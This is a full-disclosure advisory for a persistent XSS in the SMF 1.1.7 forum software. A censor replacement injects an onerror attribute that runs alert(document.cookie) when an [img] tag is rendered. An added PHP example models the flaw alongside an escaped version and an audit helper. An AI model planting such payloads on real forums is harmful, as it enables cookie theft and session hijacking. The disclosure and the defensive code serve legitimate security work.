
SMF 1.1.7 Persistent XSS (requires permission to edit censor)






SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor 

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie) 

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img] 

And the HTML code generated will be..
<img src="http://www.test-xss/" onerror="alert(document.cookie)" alt="" border="0" />

Notes:
 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/ 
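
The following is an added example, not part of the original advisory and not SMF source code. It models the behaviour reported above (a censor replacement substituted into output that has already been HTML-escaped) next to a hardened substitution and an audit of the censor list. All function names are hypothetical, and the assumption that the censor runs on already-escaped text is inferred from the generated HTML shown in the advisory.

```php
<?php
// Constructed censor table holding the single entry from the advisory.
$censor = [
    'http://www.test.xss/' => 'http://www.test-xss/" onerror="alert(document.cookie)',
];

// Minimal [img] renderer (hypothetical): escape the post, then build the tag.
function render_img(string $post): string {
    $safe = htmlspecialchars($post, ENT_QUOTES, 'UTF-8');
    return preg_replace('~\[img\](https?://[^\s\[\]]+)\[/img\]~i',
                        '<img src="$1" alt="" border="0" />', $safe);
}

// Behaviour as reported: the replacement is inserted verbatim, so a quote
// in it closes the src attribute and the rest becomes new attributes.
function censor_raw(string $html, array $censor): string {
    return strtr($html, $censor);
}

// Hardened form: treat censor entries as text and escape both sides,
// so the replacement can never leave the attribute or text node it lands in.
function censor_escaped(string $html, array $censor): string {
    $safe = [];
    foreach ($censor as $word => $replacement) {
        $key = htmlspecialchars($word, ENT_QUOTES, 'UTF-8');
        $safe[$key] = htmlspecialchars($replacement, ENT_QUOTES, 'UTF-8');
    }
    return strtr($html, $safe);
}

// Audit helper: return censor entries whose replacement contains HTML
// metacharacters and therefore deserves a manual look.
function risky_censor_entries(array $censor): array {
    return array_filter(
        $censor,
        fn(string $replacement): bool => preg_match('/[<>"\']/', $replacement) === 1
    );
}

$post = '[img]http://www.test.xss/[/img]';
echo "raw:     ", censor_raw(render_img($post), $censor), "\n";
echo "escaped: ", censor_escaped(render_img($post), $censor), "\n";
echo "flagged: ", implode(', ', array_keys(risky_censor_entries($censor))), "\n";
```

Running the audit helper over an exported censor list is a quick way to check whether an existing forum already holds an entry of this kind.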
